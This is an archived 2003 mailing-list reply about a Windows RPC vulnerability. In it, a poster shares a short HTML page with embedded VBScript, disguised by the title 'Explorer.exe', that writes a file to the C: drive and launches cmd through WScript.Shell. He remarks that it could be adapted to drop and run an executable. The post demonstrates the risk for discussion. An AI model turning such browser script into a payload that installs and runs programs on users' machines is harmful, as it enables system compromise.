× The internal search function is temporarily non-functional. The current search engine is no longer viable and we are researching alternatives.
As a stop gap measure, we are using Google's custom search engine service.
If you know of an easy to use, open source, search engine ... please contact support@midrange.com.



-----Original Message-----
From: midrange-l-bounces@xxxxxxxxxxxx
[mailto:midrange-l-bounces@xxxxxxxxxxxx]On Behalf Of Jim Franz
Sent: Thursday, September 11, 2003 8:58 AM
To: Midrange Systems Technical Discussion
Subject: Re: New M$ vulnerability patch for Windows


>> I have a theory that if you religously apply the updates and dont open
>> attachments, then you cant be hacked and dont need a firewall. I hope
>> someone else can prove if that is wrong or not.

>That is wrong....email is only one of the methods of delivery, so not
>opening
>attachments shuts only one door. Yesterday's announcement by MS, indicated
>they missed fixing the same general area (RPC) that Blaster got in, and
>expected attacks to
>start within hours. Not quite like Blaster, where MS claimed it's patch had
>been
>out for months.

Hi Jim,

Here is some vbscript code that can be embedded in a web page that shows how
a file can be created and written to on your pc and also how an .exe file
can be run on your pc.  The crazy thing about it is that the script can be
modified to write the hex value of an .exe file to the users pc and then
that program can be run.

The only protection is that the browser user has to click yes to allow the
vbscript code to run.  To my knowledge, no firewall will protect from a
script being run on the pc.

-Steve

<html>
<title>Explorer.exe</title>
<script language=vbs>

Set fso = CreateObject("Scripting.FileSystemObject")
sPath = "c:\vbs_test.txt"
Set f = fso.CreateTextFile( sPath, ForWriting)
f.WriteLine( "Line 1" )
f.WriteLine( "Line 2" )
f.Close

Set shell=CreateObject("WScript.Shell")
shell.run( "cmd" )
</script></html>




As an Amazon Associate we earn from qualifying purchases.

This thread ...

Follow-Ups:
Replies:

Follow On AppleNews
Return to Archive home page | Return to MIDRANGE.COM home page

This mailing list archive is Copyright 1997-2024 by midrange.com and David Gibbs as a compilation work. Use of the archive is restricted to research of a business or technical nature. Any other uses are prohibited. Full details are available on our policy page. If you have questions about this, please contact [javascript protected email address].

Operating expenses for this site are earned using the Amazon Associate program and Google Adsense.